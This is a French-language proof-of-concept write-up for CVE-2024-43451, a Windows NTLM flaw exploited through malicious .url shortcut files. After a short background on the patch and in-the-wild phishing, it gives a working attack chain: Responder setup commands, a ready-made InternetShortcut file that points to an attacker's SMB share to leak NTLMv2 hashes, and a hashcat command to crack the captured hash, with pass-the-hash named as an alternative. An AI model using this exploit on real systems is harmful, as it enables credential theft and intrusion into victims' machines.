
CVE-2024-43451 est une vulnérabilité NTLM de Windows qui permet à un attaquant de forcer l'authentification et de capturer des hachages NTLM en utilisant des raccourcis malveillants.
CVE-2024-43451 est une vulnérabilité zero-day dans Microsoft Windows qui permet aux attaquants de capturer des hachages de mot de passe NTLMv2 avec une interaction minimale de l'utilisateur, pouvant conduire à un vol d'identifiants. Une méthode couramment exploitée consiste à utiliser l'authentification NTLM via des connexions SMB vers un serveur distant afin de capturer le hachage. Cette vulnérabilité a été corrigée dans les mises à jour de novembre 2024. Il est conseillé aux utilisateurs d'appliquer les correctifs de sécurité pertinents pour atténuer le risque.
Cette attaque a été découverte activement exploitée via un e-mail de phishing envoyé depuis un serveur gouvernemental ukrainien compromis. L'e-mail contient un fichier URL malveillant. Lorsque l'utilisateur interagit avec le fichier en cliquant droit, en le supprimant ou en le déplaçant, la vulnérabilité est activée. Cela déclenche une connexion au serveur de l'attaquant, entraînant le téléchargement de fichiers malveillants supplémentaires, tels que le malware SparkRAT (un cheval de Troie d'accès à distance open-source qui permet à l'attaquant de prendre le contrôle du système de la victime).
NTLMv2 est actuellement la version la plus sécurisée et la plus pertinente aujourd'hui.
image
Pour créer un environnement de travail pour ce POC, nous devons configurer une machine Windows cible avec un numéro de build publié avant novembre 2024, et un serveur distant pour simuler la capture du hachage :
Responder pour capturer le hachage via SMB :
brew install python3
git clone https://github.com/lgandx/Responder.git
cd Responder
sudo python3 Responder.py -I <put your network interface> -v
\\(adresse IP du serveur distant) :
Puisque tout ce dont l'exploit a besoin est d'établir une connexion SMB avec le serveur distant, nous pouvons utiliser un simple fichier pour le simuler :
[InternetShortcut]
URL=\\(adresse IP du serveur distant)\share
IconIndex=32
IconFile=C:\Windows\System32\shell32.dll
Une fois le fichier préparé et livré sur le système cible, le vol du hachage nécessite une interaction minimale de l'utilisateur. Cette interaction peut inclure l'une des actions suivantes :
https://github.com/user-attachments/assets/fd6389b5-4ee9-4d90-a76e-562394b24058
https://github.com/user-attachments/assets/b820ea73-b0fc-40f1-920e-28cf7869f1e2
Avec le hachage non chiffré en main, nous pouvons soit tenter de le casser pour révéler le mot de passe en clair,
soit l'utiliser dans une attaque "Pass-the-Hash" avec des outils comme Mimikatz ou Metasploit.
Dans notre cas, une simple commande Hashcat révèle mon mot de passe :
hashcat -m 5600 leak.txt rockyou.txt
